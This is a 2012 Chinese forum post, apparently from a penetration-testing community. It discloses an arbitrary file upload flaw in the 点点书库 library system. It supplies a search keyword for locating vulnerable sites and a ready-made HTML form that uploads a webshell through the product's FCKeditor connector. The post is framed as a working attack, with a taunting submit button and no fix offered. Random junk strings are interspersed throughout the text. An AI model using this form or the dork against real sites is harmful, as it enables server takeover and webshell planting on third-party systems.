中国网络渗透测试联盟
标题:
点点书库图书馆系统文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 21:20
标题:
点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
% f" Z4 W, v" c6 |% t
作者:冰锋刺客
+ ]6 i: `. o) |" F/ J; D: p
厂商:点击书(dianjishu.com)
& {# j9 i# e6 G
日期:2012-6-21
0 Q1 u$ P, F8 C+ B$ O, L/ }
$ }% L1 T5 \, }3 p0 u! C& N
I 概述
0 d3 R8 W e( D9 t: x% ?
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
7 N" e6 A3 E; r8 [
II 简介
/ _, u% E; S N7 ?, ]
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
* b/ ~' r' ]7 ~+ N7 V' e& O
补充一个漏洞
8 f- Q1 c+ g% k1 C
<form id="frmUpload" enctype="multipart/form-data"
$ A; c, L4 H/ Z
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
% _; |' T1 o, [! E, b Z
<input id="btnUpload" type="submit" value="操翻他">
7 }) Z/ S4 v H5 k% E5 @- y, M
</form>
' ]9 e* r/ F* q4 _
你们懂的
+ O7 j# M$ L- P/ _0 C
那傻逼提供还需要改包.
/ I, s) F' K' C0 N$ s% R2 Y* B ?
自己看了下源代码发现fckeditor
, D/ ]- {9 D: M
直接秒杀
5 P/ g+ o# z: P0 y/ F
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2